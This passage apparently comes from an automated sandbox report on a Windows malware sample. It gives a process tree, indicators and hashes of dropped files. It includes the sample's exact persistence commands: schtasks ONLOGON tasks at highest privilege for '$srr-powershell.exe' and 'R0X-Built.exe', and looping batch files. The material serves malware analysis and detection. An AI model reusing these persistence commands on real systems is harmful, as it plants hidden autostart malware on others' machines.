- Drops file in System32 directory
PID:4216 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f20⤵
- Creates scheduled task(s)
PID:452 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV121⤵PID:4608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\52Ylj4TrTC5V.bat" "20⤵PID:4296
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV121⤵PID:2540
-
-
C:\Windows\SysWOW64\chcp.comchcp 6500121⤵PID:5064
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost21⤵
- Runs ping.exe
PID:4508
-
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exe"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"21⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:3344 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f22⤵
- Creates scheduled task(s)
PID:2632 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV123⤵PID:560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1ltzrm9FhheS.bat" "22⤵PID:3356
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV123⤵PID:1456
-
-
C:\Windows\SysWOW64\chcp.comchcp 6500123⤵PID:4040
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost23⤵
- Runs ping.exe
PID:3604
-
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exe"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"23⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:212 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f24⤵
- Creates scheduled task(s)
PID:636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\o6NcFKpkqcKR.bat" "24⤵PID:1928
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV125⤵PID:3644
-
-
C:\Windows\SysWOW64\chcp.comchcp 6500125⤵PID:2316
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost25⤵
- Runs ping.exe
PID:2084
-
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exe"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"25⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:2516 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f26⤵
- Creates scheduled task(s)
PID:2336 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV127⤵PID:2992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hGpVidYJxGLv.bat" "26⤵PID:2108
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV127⤵PID:3324
-
-
C:\Windows\SysWOW64\chcp.comchcp 6500127⤵PID:1444
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost27⤵
- Runs ping.exe
PID:3100
-
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exe"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"27⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:2780 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f28⤵
- Creates scheduled task(s)
PID:1440 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV129⤵PID:552
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JqteHl0WKjgs.bat" "28⤵PID:3356
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV129⤵PID:1128
-
-
C:\Windows\SysWOW64\chcp.comchcp 6500129⤵PID:3616
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost29⤵
- Runs ping.exe
PID:4732
-
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exe"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"29⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:2556 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f30⤵
- Creates scheduled task(s)
PID:1488 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV131⤵PID:536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kLHApnaBrkBd.bat" "30⤵PID:4632
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV131⤵
- Suspicious use of SetWindowsHookEx
PID:3628
-
-
C:\Windows\SysWOW64\chcp.comchcp 6500131⤵PID:1452
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost31⤵
- Runs ping.exe
PID:972
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
PID:4592
-
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:5016
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3664
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3856
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:4024
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3552
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4496
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4188
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3440
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
PID:2008
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3864
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2728
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:3684
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:1192
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1480
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD510eab9c2684febb5327b6976f2047587
SHA1a12ed54146a7f5c4c580416aecb899549712449e
SHA256f49dbd55029bfbc15134f7c6a4f967d6c39142c63f2e8f1f8c78fab108a2c928
SHA5127e5fd90fffae723bd0c662a90e0730b507805f072771ee673d1d8c262dbf60c8a03ba5fe088f699a97c2e886380de158b2ccd59ee62e3d012dd6dd14ea9d0e50
-
Filesize
206B
MD54d90b46b823c85058da98d965e996a4b
SHA11c7b3cad49ef9ecf558d215798d56dfb9a51ddc6
SHA256948fbc9ee25324af71c9f4b949d463ae10af7296819f6d238436fab9bb3a43b9
SHA512e055d2087727311af04002201458cb2eb7ee4fdcfb00624de59dd553c21a66a2277f3bc54470eb79937e79404367c52e8ccf6c307eb95787c620ac7225e8adb0
-
Filesize
206B
MD5271a49fec551cbee4f4fb1b7e47ed36c
SHA170bbe9f566906ac09e82680abd0dc874eb090b53
SHA256da5a1a713f9bbe7ad382a5f7e3a9713b29a3dbd80e058da6ab1d2901376e69a0
SHA5124ab0e192f03774b08bb969622380791c52e154a68318b4c5a25de307272a48be56488f26accd302bef8d373afcc469b3820db7e6e071c5ec106a6ea8704a92ce
-
Filesize
206B
MD5af8476d14dfb6d6f692fa9cc2a7931bf
SHA18774f2a0c396bf8bb7de96090f4fd5944b94264d
SHA25699659e3090bedc6f95b64fd79ea83087ba957b0b578d64e463402e67429a61d0
SHA512589b17b697fbd9efad3438c75910beb67b119af1ca5a677979a96e140ecb9ea72ada482daad5d0383beda28628a1f404e7344b3376773519f078d319b95da643
-
Filesize
206B
MD543bacd615fa6067f4b1ef0abfdc9fc90
SHA19cc5f7c6fe1d121e8ab7c6f5c75a7c6a58243c64
SHA256919fe54e62d44e9454e27fde8d2726aefb8f53c9ce8988c10ad34f578812f760
SHA5128af5fbad7efaba60deb530c6c4d92f73cd34971da721a540b120fe50f9a41eecc37c55d2c4b52aae3c31c4091f90e7f667520f4a6647d817c51f79fe89cb3dca
-
Filesize
206B
MD593be7c12c95f3854f244676a16ea285c
SHA1e0e46d9c704b9057ed115af397f6dcbc06163f5d
SHA256b97b61360432d7bcbc670912d8a2ac7974f921f316807a346fdeb8a15f16c6bf
SHA512fb3405951d7dc3e3484569525085ff2415c0a47f9a01fd76bd9f1b52919c68080a9d59d2fce95988a969a1f15828f3ae1b4d1a5b117bd4b54792be4e66765a7c
-
Filesize
206B
MD52539e027f8ebfdc116b7034ec8121bf7
SHA1684c064b0e313eb95a707f10cdd102f5590e2e8b
SHA2564c070bd0f8c016b54b89c3e53c10a106ad43e16a7905e285f8a30a4b71f5136d
SHA5125904eb43ed0854dc0616c1ef88ec2477113a7971dec79050b62c0845480a6c1dac2c06d74a2f7584b5e2dc9c3e3a587e77e3ceef6bc7fd109be9479d06c66530
-
Filesize
206B
MD5a0750a66213d660d7fe068b86ea0659b
SHA194078b5ef8bf788f84dca21c7101aa035359c3c3
SHA256c7514890113d16f67e3ed34ec0c1edd4f145e16bf83288c49ebb9b17d6761dea
SHA5129541b1e83a100aed276fc30f73b7611915f79e41e32841e00e40b7519c973e17c037d75249c562469dcb7c3dd5093ed132e828d5c672b61e0f7be3c2235713aa
-
Filesize
206B
MD5f767fdec6d044342a5f80ce3689bf9b8
SHA13b5b1a5ba7861937c3662380213f3794c522fae8
SHA256d24160f5c2d0b44a6004c5992c97a9a601354a805386d0657b3fdbb0c6764a26
SHA51297e19319e64e749cae0975c9bf55c3d2112e4e794f30f1d6876dbf3e8918196cff0d3e80ef18de785766a03cff612a0b90b224b290045e14f1e3afe655324de9
-
Filesize
206B
MD5c82a0cb500d9f1e4fd7e65248ce90842
SHA14c6de714f4c8b099de751399105164efc6948e79
SHA256bb3c2289f76a2ffc21ab20018cf6a56ddb9a98fdcfe518df7b3aa05484137373
SHA5127e5b738bafb24ed795a2e4c91c20461c9f65e3a43637f7043a29356a181dfe8f80c3f64bfbc5cf49dc4f494d044122cf2c2499de43eb791e1107547c97aa35c5
-
Filesize
206B
MD59e40e24044da7428fa2c205f8280a819
SHA141a76fd9fdf952872f4cb0b613a6fc5947d6e04c
SHA2564a62fd11bc3f9f691b26d1e2f9b000768c9204da4e2c3fa8a74a238f03ab0cb4
SHA5126a04e188d09b0ee3f31f114de341e5fe9cffc4b546992095e655c71e728c8e9e520d64377b158e73aa4eb64a88936e67a0557bd667308d2f8dafb72c97fe77b5
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
206B
MD56cf36fedb27e5f0a087c244858e1ad7c
SHA161b8cf455b44b42dd61ba0ef454163e468ed3754
SHA25634f6b52a41583946dc53f3516e0eebad865d14b826cef05ce6b3690d00cc10e7
SHA5121856e9007b32df7a8bc647b3b834b1f22ddffeb6fd6d5a36cc8bff250133bf2d4e22abafaed30da0c0ea1ba274ea223a6ed618cf8b4fad6b559d094e8917b22b
-
Filesize
206B
MD52c1a39928a1a25bc6b9e98976f1c46cb
SHA1ab8eef8786fb7d56ccffa760ee787b7215dee2de
SHA2569505e7440d3328d80a6e9663c5098102548c6c35f03b2d1611bb1f4aa71ebe34
SHA5121d07269810bf8de22596e0dbacdec840f01654243bd74d0883fffc3583a4b83f7f8ea96e5e36aea842b36526007a58e4c9721520d7aeb9c91cefcbee43b3dfbc
-
Filesize
206B
MD5ad6440ba687724b1fc05f2f7e32c6dce
SHA1a72e9424b07b28c49e949168b8a8b494f356d600
SHA256b5dd1d83869a72c8a0f4fbe01c3c1099ad3db18dd92d3344545b9deda81dddc4
SHA5120d9b5c2897b570a97a9b4387a3795bb8a7ceaec03c293819c31f4922ed81472c4861152da1df6cd8ec68229cd80476dbc303f7fc5f24ddeb943b4d4ef96f70d4
-
Filesize
206B
MD556b14657a5aa4203a738609f1d5e6c08
SHA1ebf39843183738292ed7d327506e896da59ff50f
SHA256e1d38609dab269da82b1eba5275ffbf0ef9c099d6982d7ea41c8127816dcb36e
SHA51202a6ffb6ce317f9a8863cdb0d7ed75a3dfce58cb4d50142e1241d3578a1b13c84d93a50b2824ab453122f863dedd6bc824efecf030f5a8a6e3f50fdaacf46ed0
-
Filesize
409KB
MD5a4a9308ce3b465b6b2dccb94b86d8a83
SHA17e594db5d7adbffa0ca6cadad7a8b037156d90cc
SHA25698bbe270ca87c08856cc3dceafef76824baa96fe031d7f00f0517b2fd898e117
SHA512393af569d8d3cbe2a12fe0c938ccd15ff2247cd1e916de71b8567cb0beb7aa93991735baf9e00db657fa626e797a70699f290a96405a8abf03c3bb24e25f977b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82